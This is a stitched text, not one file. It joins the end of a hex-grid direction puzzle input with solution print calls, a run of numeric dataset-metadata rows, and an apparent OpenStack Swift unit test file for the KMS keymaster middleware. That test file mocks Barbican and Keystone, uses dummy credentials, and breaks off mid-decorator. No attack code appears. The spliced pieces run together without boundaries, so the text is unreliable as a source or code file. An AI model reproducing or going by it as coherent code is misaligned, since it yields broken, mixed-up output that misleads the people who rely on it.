w,nw,nw,nw,n,n,n,nw,nw,n,n,n,ne,nw,nw,nw,se,n,n,nw,n,nw,n,nw,nw,n,s,nw,n,nw,nw,nw,nw,nw,ne,nw,nw,n,nw,n,n,n,nw,n,n,ne,nw,n,n,nw,sw,nw,nw,nw,nw,nw,nw,nw,nw,s,nw,se,n,nw,nw,nw,nw,nw,nw,s,nw,n,nw,n,nw,nw,nw,nw,nw,se,s,nw,se,nw,n,ne,nw,nw,nw,n,nw,nw,nw,nw,nw,nw,n,ne,nw,se,n,nw,nw,nw,nw,sw,n,nw,nw,n,nw,n,nw,nw,ne,n,nw,n,ne,se,n,sw,nw,ne,nw,sw,nw,ne,n,nw,ne,se,nw,nw,nw,nw,nw,ne,nw,n,nw,s,nw,nw,nw,ne,nw,nw,nw,nw,s,nw,n,sw,s,nw,se,nw,ne,nw,n,nw,sw,nw,n,nw,nw,sw,nw,nw,nw,nw,n,nw,nw,nw,nw,nw,nw,nw,nw,se,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,n,s,s,nw,nw,nw,se,nw,nw,nw,nw,sw,nw,nw,n,nw,n,sw,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,n,nw,s,nw,nw,nw,nw,nw,nw,nw,nw,n,nw,sw,nw,nw,nw,nw,nw,s,nw,sw,nw,nw,nw,se,nw,nw,sw,nw,nw,nw,nw,nw,nw,n,nw,nw,nw,n,nw,sw,n,nw,nw,se,nw,sw,se,sw,nw,sw,n,nw,nw,nw,ne,nw,nw,nw,se,nw,ne,ne,nw,nw,nw,nw,nw,s,nw,ne,n,nw,ne,nw,sw,nw,nw,sw,nw,se,nw,nw,ne,nw,ne,nw,sw,sw,nw,nw,nw,nw,nw,sw,nw,nw,nw,se,sw,sw,nw,s,sw,nw,nw,nw,nw,ne,nw,ne,nw,nw,sw,nw,nw,nw,sw,nw,nw,nw,ne,sw,s,nw,ne,nw,nw,se,se,n,nw,nw,sw,nw,nw,nw,nw,nw,sw,nw,nw,nw,nw,n,nw,sw,nw,s,nw,sw,nw,nw,nw,sw,nw,nw,se,nw,n,nw,nw,ne,sw,nw,ne,nw,se,s,nw,nw,n,n,nw,nw,nw,nw,ne,se,sw,nw,nw,nw,nw,se,nw,nw,nw,sw,nw,nw,s,nw,nw,nw,nw,nw,sw,nw,nw,nw,nw,sw,nw,sw,nw,nw,nw,ne,nw,sw,nw,sw,nw,sw,nw,nw,nw,sw,ne,sw,nw,sw,nw,se,nw,se,nw,nw,n,sw,nw,nw,nw,nw,sw,sw,nw,sw,nw,nw,nw,nw,nw,sw,sw,nw,nw,nw,sw,nw,nw,nw,nw,ne,nw,n,nw,sw,sw,nw,nw,nw,nw,nw,sw,nw,sw,nw,sw,sw,nw,nw,sw,sw,nw,nw,nw,ne,sw,ne,sw,sw,nw,nw,nw,nw,nw,nw,nw,sw,se,nw,nw,sw,sw,nw,nw,s,nw,nw,sw,nw,nw,nw,n,sw,nw,sw,sw,n,nw,nw,nw,sw,sw,nw,s,nw,nw,nw,sw,nw,n,nw,nw,nw,nw,n,nw,nw,nw,sw,nw,nw,nw,se,nw,sw,nw,sw,sw,sw,nw,ne,s,sw,ne,nw,nw,s,nw,sw,nw,s,nw,sw,sw,sw,s,nw,se,nw,nw,nw,sw,sw,sw,n,nw,sw,nw,nw,nw,nw,nw,nw,sw,n,nw,nw,nw,s,nw,nw,nw,nw,sw,sw,sw,nw,nw,sw,sw,nw,nw,sw,nw,sw,nw,sw,sw,sw,sw,sw,nw,sw,s,nw,nw,sw,sw,sw,sw,nw,sw,sw,nw,sw,ne,nw,sw,nw,nw,sw,nw,se,nw,n,sw,nw,s,nw,ne,nw,se,sw,sw,sw,n,ne,sw,nw,sw,nw,sw,se,s,sw,sw,nw,sw,sw,nw,nw,sw,nw,sw,nw,sw,nw,sw,sw,sw,ne,sw,nw,sw,nw,nw,sw,nw,n,nw,sw,n,nw,nw,sw,sw,se,nw,nw,sw,nw,sw,sw,sw,sw,nw,se,sw,sw,nw,nw,sw,sw,sw,nw,sw,nw,nw,nw,sw,n,nw,sw,n,nw,s,nw,nw,sw,s,sw,sw,nw,sw,sw,sw,nw,ne,sw,ne,sw,s,sw,sw,nw,sw,nw,sw,sw,nw,nw,nw,sw,sw,ne,sw,n,sw,sw,sw,n,sw,sw,nw,sw,n,n,sw,sw,sw,nw,s,sw,sw,sw,sw,nw,nw,sw,nw,sw,sw,s,sw,nw,sw,sw,sw,s,sw,sw,n,nw,sw,n,sw,sw,s,nw,se,sw,sw,sw,sw,sw,nw,sw,sw,sw,sw,sw,nw,sw,sw,sw,sw,sw,sw,sw,sw,sw,nw,nw,sw,sw,sw,s,ne,se,nw,sw,sw,sw,nw,s,nw,nw,sw,sw,s,sw,sw,se,sw,sw,sw,sw,sw,sw,sw,sw,sw,nw,sw,nw,nw,nw,nw,nw,nw,s,nw,sw,sw,sw,sw,sw,n,sw,se,sw,sw,s,sw,sw,sw,sw,sw,s,s,sw,s,ne,sw,sw,s,sw,sw,nw,sw,sw,sw,sw,ne,se,sw,sw,sw,sw,n,sw,sw,sw,sw,s,nw,se,nw,nw,sw,sw,nw,se,nw,se,sw,sw,sw,nw,s,sw,sw,sw,sw,sw,sw,sw,sw,sw,ne,se,nw,nw,sw,sw,sw,n,s,sw,nw,nw,se,sw,ne,sw,n,s,sw,sw,nw,sw,sw,sw,sw,sw,ne,sw,sw,se,sw,sw,sw,sw,nw,sw,sw,ne,sw,nw,sw,s,sw,sw,sw,sw,sw,sw,sw,sw,se,sw,se,sw,sw,sw,sw,sw,nw,sw,sw,sw,sw,sw,se,sw,sw,se,sw,sw,ne"""
print(solution_part_one(puzzle_input))
print(solution_part_two(puzzle_input))
| 276.943182
| 22,006
| 0.620697
| 8,502
| 24,371
| 1.770525
| 0.008469
| 0.191058
| 0.155451
| 0.117452
| 0.948449
| 0.867668
| 0.751146
| 0.577227
| 0.399787
| 0.267455
| 0
| 0.000804
| 0.030487
| 24,371
| 87
| 22,007
| 280.126437
| 0.636279
| 0.000657
| 0
| 0.397059
| 0
| 0.014706
| 0.903643
| 0.902822
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073529
| false
| 0
| 0.044118
| 0.029412
| 0.235294
| 0.029412
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a2c2206e4ff99f56682cceff966785df48ff2137
| 32,978
|
py
|
Python
|
test/unit/common/middleware/crypto/test_kms_keymaster.py
|
hashsos/hashcloudos-swift
|
25db6f317de58a9da226f97f0e2eedac658a0042
|
[
"Apache-2.0"
] | null | null | null |
test/unit/common/middleware/crypto/test_kms_keymaster.py
|
hashsos/hashcloudos-swift
|
25db6f317de58a9da226f97f0e2eedac658a0042
|
[
"Apache-2.0"
] | null | null | null |
test/unit/common/middleware/crypto/test_kms_keymaster.py
|
hashsos/hashcloudos-swift
|
25db6f317de58a9da226f97f0e2eedac658a0042
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import mock
import unittest
import sys
sys.modules['castellan'] = mock.Mock()
sys.modules['castellan.common'] = mock.Mock()
sys.modules['castellan.common.credentials'] = mock.Mock()
from keystoneauth1.exceptions.connection import ConnectFailure
from keystoneauth1.exceptions.http import Unauthorized
from keystoneclient.exceptions import DiscoveryFailure
from swift.common.middleware.crypto import kms_keymaster
from swift.common.swob import Request
from test.unit.common.middleware.helpers import FakeSwift, FakeAppThatExcepts
TEST_KMS_INVALID_KEY_ID = 'invalid-kms-key-id'
TEST_KMS_NONEXISTENT_KEY_ID = '11111111-1111-1111-1111-ffffffffffff'
TEST_KMS_OPAQUE_KEY_ID = '22222222-2222-2222-2222-aaaaaaaaaaaa'
TEST_KMS_SHORT_KEY_ID = '22222222-2222-2222-2222-bbbbbbbbbbbb'
TEST_KMS_DES_KEY_ID = '22222222-2222-2222-2222-cccccccccccc'
TEST_KMS_NONE_KEY_ID = '22222222-2222-2222-2222-dddddddddddd'
TEST_KMS_INVALID_API_VERSION = 'vBadVersion'
TEST_KMS_INVALID_USER_DOMAIN_NAME = "baduserdomainname"
TEST_KMS_CONNECT_FAILURE_URL = 'http://endpoint_url_connect_error:45621'
TEST_KMS_NON_BARBICAN_URL = 'http://endpoint_url_nonbarbican:45621'
TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF = {
'keymaster_config_path': 'PATH_TO_KEYMASTER_CONFIG_FILE',
}
TEST_KMS_KEYMASTER_CONF = {
'auth_endpoint': 'kmsauthurlv3',
'password': 'kmspass',
'username': 'kmsuser',
'user_domain_id': None,
'user_domain_name': 'default',
'project_id': None,
'project_name': 'kmsproject',
'project_domain_id': None,
'project_domain_name': 'default',
'key_id': 'valid_kms_key_id-abcdefg-123456'
}
def capture_start_response():
calls = []
def start_response(*args):
calls.append(args)
return start_response, calls
def mock_castellan_api_side_effect(*args, **kwargs):
return MockBarbicanKeyManager(args[0])
def mock_options_set_defaults_side_effect(*args, **kwargs):
'''
Add options from kwargs into args dict.
'''
args[0].update(kwargs)
def mock_config_opts_side_effect(*args, **kwargs):
return dict()
def mock_keystone_password_side_effect(username, password, project_name,
user_domain_name, project_domain_name,
user_id, user_domain_id, trust_id,
domain_id, domain_name, project_id,
project_domain_id, reauthenticate):
return MockPassword(username, password, project_name, user_domain_name,
project_domain_name, user_id, user_domain_id, trust_id,
domain_id, domain_name, project_id, project_domain_id,
reauthenticate)
ERR_MESSAGE_SECRET_INCORRECTLY_SPECIFIED = 'Secret incorrectly specified.'
ERR_MESSAGE_KEY_UUID_NOT_FOUND = 'Key not found, uuid: '
class MockBarbicanKeyManager(object):
def __init__(self, conf):
self.conf = conf
def get(self, ctxt, key_id):
# If authentication fails, raise an exception here.
if (TEST_KMS_KEYMASTER_CONF['username'] !=
ctxt.username
or TEST_KMS_KEYMASTER_CONF['password'] !=
ctxt.password or
TEST_KMS_KEYMASTER_CONF['user_domain_name'] !=
ctxt.user_domain_name):
raise Unauthorized(
message='The request you have made requires authentication.',
http_status=401)
elif self.conf['auth_endpoint'] == TEST_KMS_CONNECT_FAILURE_URL:
raise ConnectFailure('Unable to establish connection')
elif self.conf['auth_endpoint'] == TEST_KMS_NON_BARBICAN_URL:
raise DiscoveryFailure(
'Could not determine a suitable URL for the plugin')
elif (self.conf['auth_endpoint'] !=
TEST_KMS_KEYMASTER_CONF['auth_endpoint']):
raise Unauthorized(
message='Cannot authorize API client.')
elif (key_id == TEST_KMS_NONEXISTENT_KEY_ID):
message = ERR_MESSAGE_KEY_UUID_NOT_FOUND + key_id
'''
Raising a ManagedObjectNotFoundError would require importing it
from castellan.common.exception. To avoid this import, raising a
general Exception.
'''
raise Exception(message)
elif key_id == TEST_KMS_INVALID_KEY_ID:
raise ValueError(ERR_MESSAGE_SECRET_INCORRECTLY_SPECIFIED)
elif key_id == TEST_KMS_NONE_KEY_ID:
return None
return MockBarbicanKey(b'x' * 32, key_id)
class MockBarbicanKey(object):
def __init__(self, key_material, key_id):
self.key_material = key_material
self.bit_length = len(key_material) * 8
if key_id == TEST_KMS_OPAQUE_KEY_ID:
self.format = 'Opaque'
else:
self.format = 'RAW'
self.algorithm = "aes"
if key_id == TEST_KMS_DES_KEY_ID:
self.format = 'des'
if key_id == TEST_KMS_SHORT_KEY_ID:
self.bit_length = 128
self.key_material[:128]
def get_encoded(self):
return self.key_material
def format(self):
return self.format
class MockPassword(object):
def __init__(self, username, password, project_name, user_domain_name,
project_domain_name, user_id, user_domain_id, trust_id,
domain_id, domain_name, project_id, project_domain_id,
reauthenticate):
self.password = password
self.username = username
self.user_domain_name = user_domain_name
self.project_name = project_name
self.project_domain_name = project_domain_name
self.user_id = user_id,
self.user_domain_id = user_domain_id,
self.trust_id = trust_id,
self.domain_id = domain_id,
self.domain_name = domain_name,
self.project_id = project_id,
self.project_domain_id = project_domain_id,
self.reauthenticate = reauthenticate
class TestKmsKeymaster(unittest.TestCase):
"""
Unit tests for storing the encryption root secret in a Barbican external
key management system accessed using Castellan.
"""
def setUp(self):
super(TestKmsKeymaster, self).setUp()
self.swift = FakeSwift()
"""
Tests using the v3 Identity API, where all calls to Barbican are mocked.
"""
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch.object(kms_keymaster.KmsKeyMaster,
'_get_root_secret')
def test_filter_v3(self, mock_get_root_secret_from_kms,
mock_readconf):
mock_get_root_secret_from_kms.return_value = (
base64.b64encode(b'x' * 32))
mock_readconf.return_value = TEST_KMS_KEYMASTER_CONF
factory = kms_keymaster.filter_factory(TEST_KMS_KEYMASTER_CONF)
self.assertTrue(callable(factory))
self.assertTrue(callable(factory(self.swift)))
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch.object(kms_keymaster.KmsKeyMaster,
'_get_root_secret')
def test_app_exception_v3(self, mock_get_root_secret_from_kms,
mock_readconf):
mock_get_root_secret_from_kms.return_value = (
base64.b64encode(b'x' * 32))
mock_readconf.return_value = TEST_KMS_KEYMASTER_CONF
app = kms_keymaster.KmsKeyMaster(
FakeAppThatExcepts(), TEST_KMS_KEYMASTER_CONF)
req = Request.blank('/', environ={'REQUEST_METHOD': 'PUT'})
start_response, _ = capture_start_response()
self.assertRaises(Exception, app, req.environ, start_response)
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch.object(kms_keymaster.KmsKeyMaster, '_get_root_secret')
def test_get_root_secret(
self, mock_get_root_secret_from_kms, mock_readconf):
# Successful call with coarse _get_root_secret_from_kms() mock.
mock_get_root_secret_from_kms.return_value = (
base64.b64encode(b'x' * 32))
'''
Return valid Barbican configuration parameters.
'''
mock_readconf.return_value = TEST_KMS_KEYMASTER_CONF
'''
Verify that keys are derived correctly by the keymaster.
'''
self.app = kms_keymaster.KmsKeyMaster(self.swift,
TEST_KMS_KEYMASTER_CONF)
'''
Verify that _get_root_secret_from_kms() was called with the
correct parameters.
'''
mock_get_root_secret_from_kms.assert_called_with(
TEST_KMS_KEYMASTER_CONF
)
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config, mock_keystone_password):
# Successful call with finer grained mocks.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return valid Barbican configuration parameters.
'''
mock_readconf.return_value = TEST_KMS_KEYMASTER_CONF
'''
Verify that no exceptions are raised by the mocked functions.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(self.swift,
TEST_KMS_KEYMASTER_CONF)
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_invalid_key_id(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Invalid key ID.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['key_id'] = TEST_KMS_INVALID_KEY_ID
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though key id invalid')
except ValueError as e:
self.assertEqual(e.message,
ERR_MESSAGE_SECRET_INCORRECTLY_SPECIFIED)
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_nonexistent_key_id(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Nonexistent key.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['key_id'] = TEST_KMS_NONEXISTENT_KEY_ID
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though key id invalid')
except Exception as e:
expected_message = ('Key not found, uuid: ' +
TEST_KMS_NONEXISTENT_KEY_ID)
self.assertEqual(e.message, expected_message)
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_invalid_key_format(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Nonexistent key.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['key_id'] = TEST_KMS_OPAQUE_KEY_ID
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though key format invalid')
except ValueError:
pass
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_config_file_and_params(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Both external config file and config parameters specified.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['keymaster_config_path'] = (
'PATH_TO_KEYMASTER_CONFIG_FILE'
)
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(self.swift, kms_conf)
raise Exception('Success even though config invalid')
except Exception as e:
expected_message = ('keymaster_config_path is set, but there are '
'other config options specified:')
self.assertTrue(e.message.startswith(expected_message),
"Error message does not start with '%s'" %
expected_message)
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_invalid_username(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Invalid username.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['username'] = 'invaliduser'
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though username invalid')
except Unauthorized as e:
self.assertEqual(e.http_status, 401)
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_invalid_password(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Invalid password.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['password'] = 'invalidpassword'
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though password invalid')
except Unauthorized as e:
self.assertEqual(e.http_status, 401)
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_connect_failure_auth_url(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config, mock_keystone_password):
# Connect failure kms auth_url.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['auth_endpoint'] = TEST_KMS_CONNECT_FAILURE_URL
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though auth_url invalid')
except ConnectFailure:
pass
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_bad_auth_url(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Bad kms auth_url.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['auth_endpoint'] = TEST_KMS_NON_BARBICAN_URL
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though auth_url invalid')
except DiscoveryFailure:
pass
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_bad_user_domain_name(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config, mock_keystone_password):
# Bad user domain name with mocks.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['user_domain_name'] = (
TEST_KMS_INVALID_USER_DOMAIN_NAME)
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though api_version invalid')
except Unauthorized as e:
self.assertEqual(e.http_status, 401)
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_invalid_key_algorithm(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Nonexistent key.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['key_id'] = TEST_KMS_DES_KEY_ID
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though key format invalid')
except ValueError:
pass
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
